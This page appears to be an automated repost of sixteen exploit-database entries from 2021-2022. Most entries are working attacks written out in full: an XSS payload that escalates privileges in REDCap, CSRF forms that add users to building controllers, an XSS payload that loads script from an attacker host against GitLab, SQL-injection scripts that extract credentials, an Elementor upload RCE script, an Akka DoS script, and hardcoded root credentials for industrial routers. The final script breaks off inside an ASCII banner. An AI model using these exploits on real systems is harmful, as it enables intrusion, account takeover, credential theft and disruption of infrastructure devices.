All posts by ISHACK AI BOT

  1. # Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
     # Date: 2021-10-11
     # Exploit Author: Kendrick Lam
     # References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
     # Vendor Homepage: https://projectredcap.org
     # Software Link: https://projectredcap.org
     # Version: Redcap before 11.4.0
     # Tested on: 11.2.5
     # CVE: CVE-2021-42136
     # Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf

     ### Stored XSS – Missing Data Code Value (found by Kendrick Lam)

     It was possible to store JavaScript as values for Missing Data Codes.

     - Where: Missing Data Code.
     - Payload:

       <script>
       var target = document.location.host;
       var csrf_token = csrf_token;
       var userId = '<userId>'; // Replace with your user ID.

       function privesc() {
           var xhr = new XMLHttpRequest();
           xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
           xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
           xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
           xhr.withCredentials = "true";
           var body = "";
           body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
           xhr.send(body);
           return true;
       }
       privesc();
       </script>

     - Details: The payload will escalate a regular user's privileges if viewed by an account with permission to change privileges (such as an administrator).
     - Privileges: Low privileged / regular user
     - Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
     - Privileges:
       + Store: Low privileged user is able to store Missing Data Code values.
       + Execute: Any authenticated user.

     The payload will trigger once the page loads; this means that storing the payload and sending the link to an administrator would escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
  2. # Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
     # Exploit Author: LiquidWorm

     <!DOCTYPE html>
     <html>
     <head><title>enteliTouch CSRF</title></head>
     <body>
     <!--

     Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)


     Vendor: Delta Controls Inc.
     Product web page: https://www.deltacontrols.com
     Affected version: 3.40.3935
                       3.40.3706
                       3.33.4005

     Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to
     the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display
     that serves as an interface to your building. Use it as your primary interface
     for smaller facilities or as an on-the-spot access point for larger systems.
     The intuitive, easy-to-navigate interface gives instant access to manage your BAS.

     Desc: The application interface allows users to perform certain actions via
     HTTP requests without performing any validity checks to verify the requests.
     This can be exploited to perform certain actions with administrative privileges
     if a logged-in user visits a malicious web site.

     Tested on: DELTA enteliTOUCH


     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience


     Advisory ID: ZSL-2022-5702
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php


     06.04.2022

     -->

     CSRF Add User:
     <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
       <input type="hidden" name="actionName" value="" />
       <input type="hidden" name="Username" value="zsl" />
       <input type="hidden" name="Password" value="123t00t" />
       <input type="hidden" name="AutoLogout" value="17" />
       <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
       <input type="hidden" name="ObjRef" value="" />
       <input type="hidden" name="Apply" value="true" />
       <input type="hidden" name="formAction" value="Add" />
       <input type="submit" value="Go for UserAdd" />
     </form>
     <br />
     CSRF Change Admin Password (default: delta:login):
     <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
       <input type="hidden" name="actionName" value="" />
       <input type="hidden" name="Username" value="DELTA" />
       <input type="hidden" name="Password" value="123456" />
       <input type="hidden" name="AutoLogout" value="30" />
       <input type="hidden" name="SS&#95;SelectedOptionId" value="" />
       <input type="hidden" name="ObjRef" value="ZSL-251" />
       <input type="hidden" name="Apply" value="true" />
       <input type="hidden" name="formAction" value="Edit" />
       <input type="submit" value="Go for UserEdit" />
     </form>
     </body>
     </html>
  3. # Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
     # Exploit Author: LiquidWorm

     <!DOCTYPE html>
     <html>
     <head><title>enteliTouch XSS</title></head>
     <body>
     <!--

     Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)


     Vendor: Delta Controls Inc.
     Product web page: https://www.deltacontrols.com
     Affected version: 3.40.3935
                       3.40.3706
                       3.33.4005

     Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to
     the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display
     that serves as an interface to your building. Use it as your primary interface
     for smaller facilities or as an on-the-spot access point for larger systems.
     The intuitive, easy-to-navigate interface gives instant access to manage your BAS.

     Desc: Input passed to the POST parameter 'Username' is not properly sanitised
     before being returned to the user. This can be exploited to execute arbitrary
     HTML code in a user's browser session in context of an affected site.

     Tested on: DELTA enteliTOUCH


     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience


     Advisory ID: ZSL-2022-5703
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php


     06.04.2022

     -->

     <form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
       <input type="hidden" name="userInfo" value="" />
       <input type="hidden" name="UL&#95;SelectedOptionId" value="" />
       <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
       <input type="hidden" name="formAction" value="Delete" />
       <input type="submit" value="CSRF XSS Alert!" />
     </form>
     </body>
     </html>
  4. Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
     Exploit Author: LiquidWorm

     Vendor: Delta Controls Inc.
     Product web page: https://www.deltacontrols.com
     Affected version: 3.40.3935
                       3.40.3706
                       3.33.4005

     Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to
     the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display
     that serves as an interface to your building. Use it as your primary interface
     for smaller facilities or as an on-the-spot access point for larger systems.
     The intuitive, easy-to-navigate interface gives instant access to manage your BAS.

     Desc: The application suffers from a cleartext transmission/storage of sensitive
     information in a Cookie. This allows a remote attacker to intercept the HTTP
     Cookie authentication credentials through a man-in-the-middle attack.

     Tested on: DELTA enteliTOUCH


     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience


     Advisory ID: ZSL-2022-5704
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php


     06.04.2022

     --

     GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
     Host: 192.168.0.210
     Cache-Control: max-age=0
     User-Agent: Toucher/1.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
     Connection: close
  5. # Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
     # Date: 31/01/2022
     # Exploit Author: Hemant Kashyap
     # Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
     # Version: PKP Open Journals System 2.4.8 >= 3.3
     # Tested on: All OS
     # CVE : CVE-2022-24181
     # References: https://youtu.be/v8-9evO2oVg

     XSS via Host Header injection and Steal Password Reset Token of another user

     Steps to reproduce:

     1) Go to this site: https://who's-using-ojs-software.com
     2) Capture this request in Burp and send it to Repeater.
     3) Add this after the Host header:
        X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
     4) Click on send; after this, right click on the request and click on "show response in browser", then copy the request.
     5) Paste this request in the browser, and you'll see the XSS pop-up.

     Mitigation: Update to a newer version.

     This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8: all are vulnerable to XSS via Host Header injection and a steal-password-reset-token vulnerability.
  6. # Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
     # Date: 04/16/2022
     # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
     # Vendor Homepage: https://elementor.com/
     # Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
     # Version: 3.6.0, 3.6.1, 3.62
     # Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)

     #!/usr/bin/python
     import requests
     import re

     # WARNING: This exploit does NOT include the payload.
     # Also, be sure you already have some valid credentials. This exploit needs an account in order to work.

     # # # # # VULNERABILITY DESCRIPTION # # # # #
     # The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
     # This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
     # The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
     #
     # At the end of this file you can find this code:
     # add_action( 'admin_init', function() {
     #     if ( wp_doing_ajax() &&
     #         isset( $_POST['action'] ) &&
     #         isset( $_POST['_nonce'] ) &&
     #         wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
     #     ) {
     #         $this->maybe_handle_ajax();
     #     }
     # } );
     #
     # This code is triggered whenever ANY user account visits /wp-admin
     # In order to work we need the following 4 things:
     # 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
     # 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
     # 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in the DoLogin function)
     # 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
     #
     # The file we upload must have the following structure:
     # 1. It must be a ZIP file. You can name it as you want.
     # 2. It must contain a folder called "elementor-pro"
     # 3. This folder must contain a file named "elementor-pro.php"
     # 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL
     #    e.g.
     #    <?php
     #    /**
     #     * Plugin Name: Elementor Pro
     #     */
     #    // Actual PHP payload
     #    ?>
     #    This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
     #
     # WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
     # If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
     # In order to prevent this, I suggest you to use some variable to activate the payload.
     # Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
     # if (!isset($_GET['activate']))
     #     return;

     # Change the following 4 variables:
     payloadFileName = 'elementor-pro.zip'          # Change this with the path of the ZIP archive that contains your payload
     baseUrl = 'http://192.168.56.103/wordpress/'   # Change this with the base url of the target
     username = 'guest'                             # Change this with the username you want to use to log in
     password = 'test'                              # Change this with the password you want to use to log in
     # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

     session = requests.Session()
     cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies

     def DoLogin(username, password):
         global cookies
         loginUrl = baseUrl + 'wp-login.php'
         adminUrl = baseUrl + 'wp-admin/'
         data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }

         # search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
         # 4e8878bdba is just an example of nonce. It can be anything else.
         regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')

         response = session.post(loginUrl, cookies=cookies, data=data)
         search = regexp.search(response.text)

         if not search:
             # I've tested this on WordPress v. 5.9.3
             # Fix the regexp if needed.
             print('Error - Invalid credentials?')
             #print(response.text)
             return None
         else:
             return search.group(1)

     def UploadFile(fileName, nonce):
         uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
         data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
         files = { 'fileToUpload' : open(fileName, 'rb') }
         regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true

         response = session.post(uploadUrl, data=data, files=files)
         search = regexp.search(response.text)

         if not search:
             # If Elementor Pro is already installed, the upload will fail.
             # You can print the response to investigate further
             print ('Error - Upload failed')
             # print (response.text)
             return False
         else:
             print ('Upload completed successfully!')
             return True

     # Define YOUR method to activate your payload (if needed)
     def ActivatePayload():
         payloadUrl = baseUrl + 'index.php?activate=1'
         session.get(payloadUrl)

     print('Trying to login...')
     nonce = DoLogin(username, password)
     if nonce is None:
         # Login failed or the nonce regexp did not match; nothing more to do.
         exit(1)
     print('Nonce found: ' + nonce)

     print('Uploading payload...')
     fileUploaded = UploadFile(payloadFileName, nonce)

     # Define YOUR method to activate your payload (if needed)
     if fileUploaded:
         print ('Activating payload...')
         ActivatePayload()
  7. # Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
     # Google Dork: NA
     # Date: 11/03/2022
     # Exploit Author: Ali J
     # Vendor Homepage: https://www.getfuelcms.com/
     # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0
     # Version: 1.5.0
     # Tested on: Windows 10

     Steps to Reproduce:

     1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables
     2. Select any variable, click on the delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for it. After that, drop the request.
     3. Login with user 2 in a separate browser and execute the CSRF POC.
     4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.
  8. # Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path
     # Discovery by: bios
     # Discovery Date: 2022-18-04
     # Vendor Homepage: https://www.primera.com/
     # Tested Version: 2.3.4
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Microsoft Windows 10 Pro x64

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
     PTProtect  PTProtect  C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe  Auto

     C:\>sc qc PTProtect
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: PTProtect
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : PTProtect
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\>systeminfo
     Host Name:                 DESKTOP-OUHAB1I
     OS Name:                   Microsoft Windows 10 Pro
     OS Version:                10.0.19044 N/A Build 19044
  9. # Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
     # Discovery by: bios
     # Discovery Date: 2022-18-04
     # Vendor Homepage: https://www.easeus.com/
     # Tested Version: 15.1.0.0
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Microsoft Windows 10 Pro x64

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
     EaseUS UPDATE SERVICE  EaseUS UPDATE SERVICE  C:\Program Files (x86)\EaseUS\ENS\ensserver.exe  Auto

     C:\>sc qc "EaseUS UPDATE SERVICE"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: EaseUS UPDATE SERVICE
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : EaseUS UPDATE SERVICE
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\>systeminfo
     Host Name:                 DESKTOP-HR3T34O
     OS Name:                   Microsoft Windows 10 Home
     OS Version:                10.0.19042 N/A Build 19042
  10. # Exploit Title: Gitlab 14.9 - Authentication Bypass
      # Date: 12/04/2022
      # Exploit Authors: Greenwolf
      # Vendor Homepage: https://about.gitlab.com/
      # Software Link: https://about.gitlab.com/install
      # Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2
      # Tested on: Linux
      # CVE : CVE-2022-1162
      # References: https://github.com/Greenwolf/CVE-2022-1162

      A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2, allowing attackers to potentially take over accounts.

      Exploit:

      New Gitlab accounts (created since the first affected version, and if Gitlab is before the patched version) can be logged into with the following password:

      123qweQWE!@#000000000
  11. # Exploit Title: Gitlab Stored XSS
      # Date: 12/04/2022
      # Exploit Authors: Greenwolf
      # Vendor Homepage: https://about.gitlab.com/
      # Software Link: https://about.gitlab.com/install
      # Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2
      # Tested on: Linux
      # CVE : CVE-2022-1175
      # References: https://github.com/Greenwolf/CVE-2022-1175

      Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens, leading users who visit the XSS page to silently have their accounts backdoored.

      Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change the javascript on your site to match the script names being called in the page. This can break things on the page though.

      <pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>

      Standard script include also works depending on the site's CSP policy. This is more stealthy.

      <pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>
  12. # Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload
      # Date: 7/4/2022
      # Exploit Author: Ünsal Furkan Harani (Zemarkhos)
      # Vendor Homepage: https://www.impresscms.org/
      # Software Link: https://github.com/ImpressCMS/impresscms
      # Version: v1.4.4

      # Description: Between lines 152 and 162, we see the function "extensionsToBeSanitized". Since the blacklist method is weak, it is familiar that the file can be uploaded with the extensions mentioned below.

      .php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc

      Impresscms/core/File/MediaUploader.php

      Between lines 152 and 162:

      private $extensionsToBeSanitized = array('php','phtml','phtm','php3','php4','cgi','pl','asp','php5');
  13. # Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi
      # Date: 2022-25-03
      # Exploit Author: Eren Gozaydin
      # Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
      # Version: 1.0
      # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
      # CVE: CVE-2022-27927
      # References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927

      ------------------------------------------------------------------------------------

      1. Description:
      ----------------------
      Microfinance Management System allows SQL Injection via parameter 'customer_number' in /mims/updatecustomer.php.
      Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

      2. Proof of Concept:
      ----------------------
      In Burpsuite intercept the request from the affected page with 'customer_number' parameter and save it like poc.txt
      Then run SQLmap to extract the data from the database:

      sqlmap.py -r poc.txt --dbms=mysql

      3. Example payload:
      ----------------------
      (error-based)

      customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

      4. Burpsuite request:
      ----------------------
      GET /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27 HTTP/1.1
      Host: localhost
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      Accept-Encoding: gzip, deflate
      Accept-Language: en-us,en;q=0.5
      Cache-Control: no-cache
      Cookie: PHPSESSID=rf50l831r3vn4ho0g6aef189bt
      Referer: http://localhost/mims/managecustomer.php
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
  14. # Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
      # Date: 18/4/2022
      # Exploit Author: cxosmo
      # Vendor Homepage: https://akka.io
      # Software Link: https://github.com/akka/akka-http
      # Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
      # Tested on: Akka HTTP 10.2.4, Ubuntu
      # CVE : CVE-2021-42697

      import argparse
      import logging
      import requests

      # Logging config
      logging.basicConfig(level=logging.INFO, format="")
      log = logging.getLogger()


      def send_benign_request(url, verify=True):
          log.info(f"Sending benign request to {url} for checking reachability...")
          try:
              r = requests.get(url, verify=verify)
              log.info(f"Benign request returned following status code: {r.status_code}")
              return True
          except Exception as e:
              log.info(f"The following exception was encountered: {e}")
              return False


      def send_malicious_request(url, verify=True):
          log.info(f"Sending malicious request to {url}")
          # Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
          nested_comment_payload = "(" * 8191
          headers = {'User-Agent': nested_comment_payload}
          try:
              r = requests.get(url, headers=headers, verify=verify)
              log.info(f"Request returned following status code: {r.status_code}")
          # Expected exception to be returned if server is DoSed successfully
          except requests.exceptions.RequestException as e:
              if "Remote end closed connection without response" in str(e):
                  log.info(f"The server is unresponsive per {e}: DoS likely successful")
          except Exception as e:
              log.info(f"The following exception was encountered: {e}")


      if __name__ == "__main__":
          # Parse command line
          parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
          required_arguments = parser.add_argument_group('required arguments')
          required_arguments.add_argument("-t", "--target", help="Target URL for vulnerable Akka server (e.g. https://localhost)", required=True, action="store")
          parser.add_argument("-k", "--insecure", help="Disable verification of SSL/TLS certificate", action="store_false", default=True)
          args = parser.parse_args()

          # Send requests: first is connectivity check, second is DoS attempt
          if send_benign_request(args.target, args.insecure):
              send_malicious_request(args.target, args.insecure)
  15. # Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
      # Date: 04/20/2022
      # Exploit Author: Behrad Taher
      # Vendor Homepage: https://sourceforge.net/projects/webtareas/
      # Version: < 2.4p3
      # CVE : CVE-2021-43481

      #The script takes 3 arguments: IP, user ID, session ID
      #Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i

      import requests, time, sys
      from bs4 import BeautifulSoup

      ip = sys.argv[1]
      id = sys.argv[2]
      sid = sys.argv[3]

      def sqli(column):
          print("Extracting %s from user with ID: %s\n" % (column, id))
          extract = ""
          for i in range(1, 33):
              #This conditional statement will account for variable length usernames
              if(len(extract) < i-1):
                  break
              for j in range(32, 127):
                  # The user ID from the command line selects which row is extracted
                  injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=%s),%d,1))=%d,sleep(5),0);" % (column, id, i, j)
                  url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
                  GET_cookies = {"webTareasSID": "%s" % sid}
                  r = requests.get(url, cookies=GET_cookies)
                  #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token
                  token = BeautifulSoup(r.text, features="html.parser").find('input', {'name': 'csrfToken'})['value']
                  #Because this is an authenticated vulnerability we need to provide a valid session token
                  POST_cookies = {"webTareasSID": "%s" % sid}
                  POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
                  start = time.time()
                  requests.post(url, cookies=POST_cookies, data=POST_data)
                  end = time.time() - start
                  if end > 5:
                      extract += chr(j)
                      print("\033[A\033[A")
                      print(extract)
                      break

      #Modularized the script for login and password values
      sqli("login")
      sqli("password")
  16. # Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
      # Exploit Author: LiquidWorm

      #!/usr/bin/env python3
      #
      #
      # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
      #
      #
      # Vendor: Jinan USR IOT Technology Limited
      # Product web page: https://www.pusr.com | https://www.usriot.com
      # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
      #                   1.2.7 (USR-LG220-L)
      #
      # Summary: USR-G806 is a industrial 4G wireless LTE router which provides
      # a solution for users to connect own device to 4G network via WiFi interface
      # or Ethernet interface. USR-G806 adopts high performance embedded CPU which
      # can support 580MHz working frequency and can be widely used in Smart Grid,
      # Smart Home, public bus and Vending machine for data transmission at high
      # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
      # flow control and has many advantages including high reliability, simple
      # operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
      # WLAN interface, 4G interface. USR-G806 provides various networking mode
      # to help user establish own network.
      #
      # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
      # within its Linux distribution image. These sets of credentials are never
      # exposed to the end-user and cannot be changed through any normal operation
      # of the device. The 'usr' account with password 'www.usr.cn' has the highest
      # privileges on the device. The password is also the default WLAN password.
      # Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
      #
      # -------------------------------------------------------------------------
      # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
      #
      # --Got rewt!
      #
      # # id;id root;pwd
      # uid=0(usr) gid=0(usr)
      # uid=2(root) gid=2(root) groups=2(root)
      # /root
      #
      # # crontab -l
      # */2 * * * * /etc/ltedial
      # */20 * * * * /etc/init.d/Net_4G_Check.sh
      # */15 * * * * /etc/test_log.sh
      # */120 * * * * /etc/pddns/pddns_start.sh start &
      # 44 4 * * * /etc/init.d/sysreboot.sh &
      # */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
      # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
      #
      # # cat /tmp/usrlte_info
      # Local time is Fri Apr 15 05:38:56 2022
      # (loop)
      # IMEI Number:8*************1
      # Operator information:********Telecom
      # signal intensity:normal(20)
      #
      # Software version number:E*****************G
      # SIM Card CIMI number:4*************7
      # SIM Card number:8******************6
      # Short message service center number:"+8**********1"
      # system information:4G Mode
      # PDP protocol:"IPV4V6"
      # CREG:register
      # Check ME password:READY
      # base station information:"4**D","7*****B"
      #
      # # cat /tmp/usrlte_info_imsi
      # 4*************7
      #
      # # exit
      #
      # lqwrm@metalgear:~$
      # -------------------------------------------------------------------------
      #
      # Tested on: GNU/Linux 3.10.14 (mips)
      #            OpenWrt/Linaro GCC 4.8-2014.04
      #            Ralink SoC MT7628 PCIe RC mode
      #            BusyBox v1.22.1
      #            uhttpd
      #            Lua
      #
      #
      # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      #                             @zeroscience
      #
      #
      # Advisory ID: ZSL-2022-5705
      # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
      #
      #
      # 10.04.2022
      #

      import paramiko as bah
      import sys as baaaaaah

      # ASCII-art banner; its original line layout was lost in extraction.
      bnr = '''
      ▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄ █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██ █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪ ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌· ▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄
